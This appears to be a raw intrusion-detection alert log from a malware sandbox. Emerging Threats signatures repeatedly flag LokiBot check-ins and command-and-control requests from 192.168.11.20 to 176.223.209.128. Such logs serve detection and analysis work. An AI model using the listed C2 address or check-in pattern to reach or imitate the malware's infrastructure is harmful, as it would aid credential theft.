                                              11/25/21-10:49:46.560009TCP2025381ET TROJAN LokiBot Checkin5003080192.168.11.20176.223.209.128
                                              11/25/21-10:49:46.560009TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003080192.168.11.20176.223.209.128
                                              11/25/21-10:49:47.093239TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003180192.168.11.20176.223.209.128
                                              11/25/21-10:49:47.093239TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003180192.168.11.20176.223.209.128
                                              11/25/21-10:49:47.093239TCP2025381ET TROJAN LokiBot Checkin5003180192.168.11.20176.223.209.128
                                              11/25/21-10:49:47.093239TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003180192.168.11.20176.223.209.128
                                              11/25/21-10:49:47.621286TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003280192.168.11.20176.223.209.128
                                              11/25/21-10:49:47.621286TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003280192.168.11.20176.223.209.128
                                              11/25/21-10:49:47.621286TCP2025381ET TROJAN LokiBot Checkin5003280192.168.11.20176.223.209.128
                                              11/25/21-10:49:47.621286TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003280192.168.11.20176.223.209.128
                                              11/25/21-10:49:48.138015TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003380192.168.11.20176.223.209.128
                                              11/25/21-10:49:48.138015TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003380192.168.11.20176.223.209.128
                                              11/25/21-10:49:48.138015TCP2025381ET TROJAN LokiBot Checkin5003380192.168.11.20176.223.209.128
                                              11/25/21-10:49:48.138015TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003380192.168.11.20176.223.209.128
                                              11/25/21-10:49:48.608440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003480192.168.11.20176.223.209.128
                                              11/25/21-10:49:48.608440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003480192.168.11.20176.223.209.128
                                              11/25/21-10:49:48.608440TCP2025381ET TROJAN LokiBot Checkin5003480192.168.11.20176.223.209.128
                                              11/25/21-10:49:48.608440TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003480192.168.11.20176.223.209.128
                                              11/25/21-10:49:49.101921TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003580192.168.11.20176.223.209.128
                                              11/25/21-10:49:49.101921TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003580192.168.11.20176.223.209.128
                                              11/25/21-10:49:49.101921TCP2025381ET TROJAN LokiBot Checkin5003580192.168.11.20176.223.209.128
                                              11/25/21-10:49:49.101921TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003580192.168.11.20176.223.209.128
                                              11/25/21-10:49:49.626649TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003680192.168.11.20176.223.209.128
                                              11/25/21-10:49:49.626649TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003680192.168.11.20176.223.209.128
                                              11/25/21-10:49:49.626649TCP2025381ET TROJAN LokiBot Checkin5003680192.168.11.20176.223.209.128
                                              11/25/21-10:49:49.626649TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003680192.168.11.20176.223.209.128
                                              11/25/21-10:49:50.135554TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003780192.168.11.20176.223.209.128
                                              11/25/21-10:49:50.135554TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003780192.168.11.20176.223.209.128
                                              11/25/21-10:49:50.135554TCP2025381ET TROJAN LokiBot Checkin5003780192.168.11.20176.223.209.128
                                              11/25/21-10:49:50.135554TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003780192.168.11.20176.223.209.128
                                              11/25/21-10:49:50.664838TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003880192.168.11.20176.223.209.128
                                              11/25/21-10:49:50.664838TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003880192.168.11.20176.223.209.128
                                              11/25/21-10:49:50.664838TCP2025381ET TROJAN LokiBot Checkin5003880192.168.11.20176.223.209.128
                                              11/25/21-10:49:50.664838TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003880192.168.11.20176.223.209.128
                                              11/25/21-10:49:51.178533TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003980192.168.11.20176.223.209.128
                                              11/25/21-10:49:51.178533TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003980192.168.11.20176.223.209.128
                                              11/25/21-10:49:51.178533TCP2025381ET TROJAN LokiBot Checkin5003980192.168.11.20176.223.209.128
                                              11/25/21-10:49:51.178533TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003980192.168.11.20176.223.209.128
                                              11/25/21-10:49:51.668767TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004080192.168.11.20176.223.209.128
                                              11/25/21-10:49:51.668767TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004080192.168.11.20176.223.209.128
                                              11/25/21-10:49:51.668767TCP2025381ET TROJAN LokiBot Checkin5004080192.168.11.20176.223.209.128
                                              11/25/21-10:49:51.668767TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004080192.168.11.20176.223.209.128
                                              11/25/21-10:49:52.098875TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004180192.168.11.20176.223.209.128
                                              11/25/21-10:49:52.098875TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004180192.168.11.20176.223.209.128
                                              11/25/21-10:49:52.098875TCP2025381ET TROJAN LokiBot Checkin5004180192.168.11.20176.223.209.128
                                              11/25/21-10:49:52.098875TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004180192.168.11.20176.223.209.128
                                              11/25/21-10:49:52.618484TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004280192.168.11.20176.223.209.128
                                              11/25/21-10:49:52.618484TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004280192.168.11.20176.223.209.128
                                              11/25/21-10:49:52.618484TCP2025381ET TROJAN LokiBot Checkin5004280192.168.11.20176.223.209.128
                                              11/25/21-10:49:52.618484TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004280192.168.11.20176.223.209.128
                                              11/25/21-10:49:53.143999TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004380192.168.11.20176.223.209.128
                                              11/25/21-10:49:53.143999TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004380192.168.11.20176.223.209.128
                                              11/25/21-10:49:53.143999TCP2025381ET TROJAN LokiBot Checkin5004380192.168.11.20176.223.209.128
                                              11/25/21-10:49:53.143999TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004380192.168.11.20176.223.209.128
                                              11/25/21-10:49:53.594525TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004480192.168.11.20176.223.209.128
                                              11/25/21-10:49:53.594525TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004480192.168.11.20176.223.209.128
                                              11/25/21-10:49:53.594525TCP2025381ET TROJAN LokiBot Checkin5004480192.168.11.20176.223.209.128
                                              11/25/21-10:49:53.594525TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004480192.168.11.20176.223.209.128
                                              11/25/21-10:49:54.082518TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004580192.168.11.20176.223.209.128
                                              11/25/21-10:49:54.082518TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004580192.168.11.20176.223.209.128
                                              11/25/21-10:49:54.082518TCP2025381ET TROJAN LokiBot Checkin5004580192.168.11.20176.223.209.128
                                              11/25/21-10:49:54.082518TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004580192.168.11.20176.223.209.128
                                              11/25/21-10:49:54.580386TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004680192.168.11.20176.223.209.128
                                              11/25/21-10:49:54.580386TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004680192.168.11.20176.223.209.128
                                              11/25/21-10:49:54.580386TCP2025381ET TROJAN LokiBot Checkin5004680192.168.11.20176.223.209.128
                                              11/25/21-10:49:54.580386TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004680192.168.11.20176.223.209.128
                                              11/25/21-10:49:55.062276TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004780192.168.11.20176.223.209.128
                                              11/25/21-10:49:55.062276TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004780192.168.11.20176.223.209.128
                                              11/25/21-10:49:55.062276TCP2025381ET TROJAN LokiBot Checkin5004780192.168.11.20176.223.209.128
                                              11/25/21-10:49:55.062276TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004780192.168.11.20176.223.209.128
                                              11/25/21-10:49:55.508760TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004880192.168.11.20176.223.209.128
                                              11/25/21-10:49:55.508760TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004880192.168.11.20176.223.209.128
                                              11/25/21-10:49:55.508760TCP2025381ET TROJAN LokiBot Checkin5004880192.168.11.20176.223.209.128
                                              11/25/21-10:49:55.508760TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004880192.168.11.20176.223.209.128
                                              11/25/21-10:49:56.010864TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004980192.168.11.20176.223.209.128
                                              11/25/21-10:49:56.010864TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004980192.168.11.20176.223.209.128
                                              11/25/21-10:49:56.010864TCP2025381ET TROJAN LokiBot Checkin5004980192.168.11.20176.223.209.128
                                              11/25/21-10:49:56.010864TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004980192.168.11.20176.223.209.128
                                              11/25/21-10:49:56.523326TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005080192.168.11.20176.223.209.128
                                              11/25/21-10:49:56.523326TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005080192.168.11.20176.223.209.128
                                              11/25/21-10:49:56.523326TCP2025381ET TROJAN LokiBot Checkin5005080192.168.11.20176.223.209.128
                                              11/25/21-10:49:56.523326TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005080192.168.11.20176.223.209.128
                                              11/25/21-10:49:57.024274TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005180192.168.11.20176.223.209.128
                                              11/25/21-10:49:57.024274TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005180192.168.11.20176.223.209.128
                                              11/25/21-10:49:57.024274TCP2025381ET TROJAN LokiBot Checkin5005180192.168.11.20176.223.209.128
                                              11/25/21-10:49:57.024274TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005180192.168.11.20176.223.209.128
                                              11/25/21-10:49:57.509550TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005280192.168.11.20176.223.209.128
                                              11/25/21-10:49:57.509550TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005280192.168.11.20176.223.209.128
                                              11/25/21-10:49:57.509550TCP2025381ET TROJAN LokiBot Checkin5005280192.168.11.20176.223.209.128
                                              11/25/21-10:49:57.509550TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005280192.168.11.20176.223.209.128
                                              11/25/21-10:49:58.004627TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005380192.168.11.20176.223.209.128
                                              11/25/21-10:49:58.004627TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005380192.168.11.20176.223.209.128
                                              11/25/21-10:49:58.004627TCP2025381ET TROJAN LokiBot Checkin5005380192.168.11.20176.223.209.128
                                              11/25/21-10:49:58.004627TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005380192.168.11.20176.223.209.128
                                              11/25/21-10:49:58.514003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005480192.168.11.20176.223.209.128
                                              11/25/21-10:49:58.514003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005480192.168.11.20176.223.209.128
                                              11/25/21-10:49:58.514003TCP2025381ET TROJAN LokiBot Checkin5005480192.168.11.20176.223.209.128
                                              11/25/21-10:49:58.514003TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005480192.168.11.20176.223.209.128
                                              11/25/21-10:49:59.022258TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005580192.168.11.20176.223.209.128
                                              11/25/21-10:49:59.022258TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005580192.168.11.20176.223.209.128
                                              11/25/21-10:49:59.022258TCP2025381ET TROJAN LokiBot Checkin5005580192.168.11.20176.223.209.128
                                              11/25/21-10:49:59.022258TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005580192.168.11.20176.223.209.128
                                              11/25/21-10:49:59.545415TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005680192.168.11.20176.223.209.128
                                              11/25/21-10:49:59.545415TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005680192.168.11.20176.223.209.128
                                              11/25/21-10:49:59.545415TCP2025381ET TROJAN LokiBot Checkin5005680192.168.11.20176.223.209.128
                                              11/25/21-10:49:59.545415TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005680192.168.11.20176.223.209.128
                                              11/25/21-10:50:00.060117TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005780192.168.11.20176.223.209.128
                                              11/25/21-10:50:00.060117TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005780192.168.11.20176.223.209.128
                                              11/25/21-10:50:00.060117TCP2025381ET TROJAN LokiBot Checkin5005780192.168.11.20176.223.209.128
                                              11/25/21-10:50:00.060117TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005780192.168.11.20176.223.209.128
                                              11/25/21-10:50:00.566566TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005880192.168.11.20176.223.209.128
                                              11/25/21-10:50:00.566566TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005880192.168.11.20176.223.209.128
                                              11/25/21-10:50:00.566566TCP2025381ET TROJAN LokiBot Checkin5005880192.168.11.20176.223.209.128
                                              11/25/21-10:50:00.566566TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005880192.168.11.20176.223.209.128
                                              11/25/21-10:50:01.074114TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005980192.168.11.20176.223.209.128
                                              11/25/21-10:50:01.074114TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005980192.168.11.20176.223.209.128
                                              11/25/21-10:50:01.074114TCP2025381ET TROJAN LokiBot Checkin5005980192.168.11.20176.223.209.128
                                              11/25/21-10:50:01.074114TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005980192.168.11.20176.223.209.128
                                              11/25/21-10:50:01.589853TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006080192.168.11.20176.223.209.128
                                              11/25/21-10:50:01.589853TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006080192.168.11.20176.223.209.128
                                              11/25/21-10:50:01.589853TCP2025381ET TROJAN LokiBot Checkin5006080192.168.11.20176.223.209.128
                                              11/25/21-10:50:01.589853TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006080192.168.11.20176.223.209.128
                                              11/25/21-10:50:02.090231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006180192.168.11.20176.223.209.128
                                              11/25/21-10:50:02.090231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006180192.168.11.20176.223.209.128
                                              11/25/21-10:50:02.090231TCP2025381ET TROJAN LokiBot Checkin5006180192.168.11.20176.223.209.128
                                              11/25/21-10:50:02.090231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006180192.168.11.20176.223.209.128
                                              11/25/21-10:50:02.599251TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006280192.168.11.20176.223.209.128
                                              11/25/21-10:50:02.599251TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006280192.168.11.20176.223.209.128
                                              11/25/21-10:50:02.599251TCP2025381ET TROJAN LokiBot Checkin5006280192.168.11.20176.223.209.128
                                              11/25/21-10:50:02.599251TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006280192.168.11.20176.223.209.128
                                              11/25/21-10:50:03.115368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006380192.168.11.20176.223.209.128
                                              11/25/21-10:50:03.115368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006380192.168.11.20176.223.209.128
                                              11/25/21-10:50:03.115368TCP2025381ET TROJAN LokiBot Checkin5006380192.168.11.20176.223.209.128
                                              11/25/21-10:50:03.115368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006380192.168.11.20176.223.209.128
                                              11/25/21-10:50:03.594284TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006480192.168.11.20176.223.209.128
                                              11/25/21-10:50:03.594284TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006480192.168.11.20176.223.209.128
                                              11/25/21-10:50:03.594284TCP2025381ET TROJAN LokiBot Checkin5006480192.168.11.20176.223.209.128
                                              11/25/21-10:50:03.594284TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006480192.168.11.20176.223.209.128
                                              11/25/21-10:50:04.083753TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006580192.168.11.20176.223.209.128
                                              11/25/21-10:50:04.083753TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006580192.168.11.20176.223.209.128
                                              11/25/21-10:50:04.083753TCP2025381ET TROJAN LokiBot Checkin5006580192.168.11.20176.223.209.128
                                              11/25/21-10:50:04.083753TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006580192.168.11.20176.223.209.128
                                              11/25/21-10:50:04.617832TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006680192.168.11.20176.223.209.128
                                              11/25/21-10:50:04.617832TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006680192.168.11.20176.223.209.128
                                              11/25/21-10:50:04.617832TCP2025381ET TROJAN LokiBot Checkin5006680192.168.11.20176.223.209.128
                                              11/25/21-10:50:04.617832TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006680192.168.11.20176.223.209.128
                                              11/25/21-10:50:05.185905TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006780192.168.11.20176.223.209.128
                                              11/25/21-10:50:05.185905TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006780192.168.11.20176.223.209.128
                                              11/25/21-10:50:05.185905TCP2025381ET TROJAN LokiBot Checkin5006780192.168.11.20176.223.209.128
                                              11/25/21-10:50:05.185905TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006780192.168.11.20176.223.209.128
                                              11/25/21-10:50:05.692300TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006880192.168.11.20176.223.209.128
                                              11/25/21-10:50:05.692300TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006880192.168.11.20176.223.209.128
                                              11/25/21-10:50:05.692300TCP2025381ET TROJAN LokiBot Checkin5006880192.168.11.20176.223.209.128
                                              11/25/21-10:50:05.692300TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006880192.168.11.20176.223.209.128
                                              11/25/21-10:50:06.194184TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006980192.168.11.20176.223.209.128
                                              11/25/21-10:50:06.194184TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5006980192.168.11.20176.223.209.128
                                              11/25/21-10:50:06.194184TCP2025381ET TROJAN LokiBot Checkin5006980192.168.11.20176.223.209.128
                                              11/25/21-10:50:06.194184TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006980192.168.11.20176.223.209.128
                                              11/25/21-10:50:06.671276TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007080192.168.11.20176.223.209.128
                                              11/25/21-10:50:06.671276TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007080192.168.11.20176.223.209.128
                                              11/25/21-10:50:06.671276TCP2025381ET TROJAN LokiBot Checkin5007080192.168.11.20176.223.209.128
                                              11/25/21-10:50:06.671276TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007080192.168.11.20176.223.209.128
                                              11/25/21-10:50:07.189424TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007180192.168.11.20176.223.209.128
                                              11/25/21-10:50:07.189424TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007180192.168.11.20176.223.209.128
                                              11/25/21-10:50:07.189424TCP2025381ET TROJAN LokiBot Checkin5007180192.168.11.20176.223.209.128
                                              11/25/21-10:50:07.189424TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007180192.168.11.20176.223.209.128
                                              11/25/21-10:50:07.699299TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007280192.168.11.20176.223.209.128
                                              11/25/21-10:50:07.699299TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007280192.168.11.20176.223.209.128
                                              11/25/21-10:50:07.699299TCP2025381ET TROJAN LokiBot Checkin5007280192.168.11.20176.223.209.128
                                              11/25/21-10:50:07.699299TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007280192.168.11.20176.223.209.128
                                              11/25/21-10:50:08.202000TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007380192.168.11.20176.223.209.128
                                              11/25/21-10:50:08.202000TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007380192.168.11.20176.223.209.128
                                              11/25/21-10:50:08.202000TCP2025381ET TROJAN LokiBot Checkin5007380192.168.11.20176.223.209.128
                                              11/25/21-10:50:08.202000TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007380192.168.11.20176.223.209.128
                                              11/25/21-10:50:08.706879TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007480192.168.11.20176.223.209.128
                                              11/25/21-10:50:08.706879TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007480192.168.11.20176.223.209.128
                                              11/25/21-10:50:08.706879TCP2025381ET TROJAN LokiBot Checkin5007480192.168.11.20176.223.209.128
                                              11/25/21-10:50:08.706879TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007480192.168.11.20176.223.209.128
                                              11/25/21-10:50:09.222780TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007580192.168.11.20176.223.209.128
                                              11/25/21-10:50:09.222780TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007580192.168.11.20176.223.209.128
                                              11/25/21-10:50:09.222780TCP2025381ET TROJAN LokiBot Checkin5007580192.168.11.20176.223.209.128
                                              11/25/21-10:50:09.222780TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007580192.168.11.20176.223.209.128
                                              11/25/21-10:50:09.674116TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007680192.168.11.20176.223.209.128
                                              11/25/21-10:50:09.674116TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007680192.168.11.20176.223.209.128
                                              11/25/21-10:50:09.674116TCP2025381ET TROJAN LokiBot Checkin5007680192.168.11.20176.223.209.128
                                              11/25/21-10:50:09.674116TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007680192.168.11.20176.223.209.128
                                              11/25/21-10:50:10.188351TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007780192.168.11.20176.223.209.128
                                              11/25/21-10:50:10.188351TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007780192.168.11.20176.223.209.128
                                              11/25/21-10:50:10.188351TCP2025381ET TROJAN LokiBot Checkin5007780192.168.11.20176.223.209.128
                                              11/25/21-10:50:10.188351TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007780192.168.11.20176.223.209.128
                                              11/25/21-10:50:10.703556TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007880192.168.11.20176.223.209.128
                                              11/25/21-10:50:10.703556TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007880192.168.11.20176.223.209.128
                                              11/25/21-10:50:10.703556TCP2025381ET TROJAN LokiBot Checkin5007880192.168.11.20176.223.209.128
                                              11/25/21-10:50:10.703556TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007880192.168.11.20176.223.209.128
                                              11/25/21-10:50:11.205022TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007980192.168.11.20176.223.209.128
                                              11/25/21-10:50:11.205022TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007980192.168.11.20176.223.209.128
                                              11/25/21-10:50:11.205022TCP2025381ET TROJAN LokiBot Checkin5007980192.168.11.20176.223.209.128
                                              11/25/21-10:50:11.205022TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007980192.168.11.20176.223.209.128
                                              11/25/21-10:50:11.714368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008080192.168.11.20176.223.209.128
                                              11/25/21-10:50:11.714368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008080192.168.11.20176.223.209.128
                                              11/25/21-10:50:11.714368TCP2025381ET TROJAN LokiBot Checkin5008080192.168.11.20176.223.209.128
                                              11/25/21-10:50:11.714368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008080192.168.11.20176.223.209.128
                                              11/25/21-10:50:12.226092TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008180192.168.11.20176.223.209.128
                                              11/25/21-10:50:12.226092TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008180192.168.11.20176.223.209.128
                                              11/25/21-10:50:12.226092TCP2025381ET TROJAN LokiBot Checkin5008180192.168.11.20176.223.209.128
                                              11/25/21-10:50:12.226092TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008180192.168.11.20176.223.209.128
                                              11/25/21-10:50:12.706710TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008280192.168.11.20176.223.209.128
                                              11/25/21-10:50:12.706710TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008280192.168.11.20176.223.209.128
                                              11/25/21-10:50:12.706710TCP2025381ET TROJAN LokiBot Checkin5008280192.168.11.20176.223.209.128
                                              11/25/21-10:50:12.706710TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008280192.168.11.20176.223.209.128
                                              11/25/21-10:50:13.215745TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008380192.168.11.20176.223.209.128
                                              11/25/21-10:50:13.215745TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008380192.168.11.20176.223.209.128
                                              11/25/21-10:50:13.215745TCP2025381ET TROJAN LokiBot Checkin5008380192.168.11.20176.223.209.128
                                              11/25/21-10:50:13.215745TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008380192.168.11.20176.223.209.128
                                              11/25/21-10:50:13.714873TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008480192.168.11.20176.223.209.128
                                              11/25/21-10:50:13.714873TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008480192.168.11.20176.223.209.128
                                              11/25/21-10:50:13.714873TCP2025381ET TROJAN LokiBot Checkin5008480192.168.11.20176.223.209.128
                                              11/25/21-10:50:13.714873TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008480192.168.11.20176.223.209.128
                                              11/25/21-10:50:14.199511TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008580192.168.11.20176.223.209.128
                                              11/25/21-10:50:14.199511TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008580192.168.11.20176.223.209.128
                                              11/25/21-10:50:14.199511TCP2025381ET TROJAN LokiBot Checkin5008580192.168.11.20176.223.209.128
                                              11/25/21-10:50:14.199511TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008580192.168.11.20176.223.209.128
                                              11/25/21-10:50:14.643842TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008680192.168.11.20176.223.209.128
                                              11/25/21-10:50:14.643842TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008680192.168.11.20176.223.209.128
                                              11/25/21-10:50:14.643842TCP2025381ET TROJAN LokiBot Checkin5008680192.168.11.20176.223.209.128
                                              11/25/21-10:50:14.643842TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008680192.168.11.20176.223.209.128
                                              11/25/21-10:50:15.146124TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008780192.168.11.20176.223.209.128
                                              11/25/21-10:50:15.146124TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008780192.168.11.20176.223.209.128
                                              11/25/21-10:50:15.146124TCP2025381ET TROJAN LokiBot Checkin5008780192.168.11.20176.223.209.128
                                              11/25/21-10:50:15.146124TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25008780192.168.11.20176.223.209.128
                                              11/25/21-10:50:15.653331TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15008880192.168.11.20176.223.209.128
                                              11/25/21-10:50:15.653331TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5008880192.168.11.20176.223.209.128
                                              11/25/21-10:50:15.653331TCP2025381ET TROJAN LokiBot Checkin5008880192.168.11.20176.223.209.128
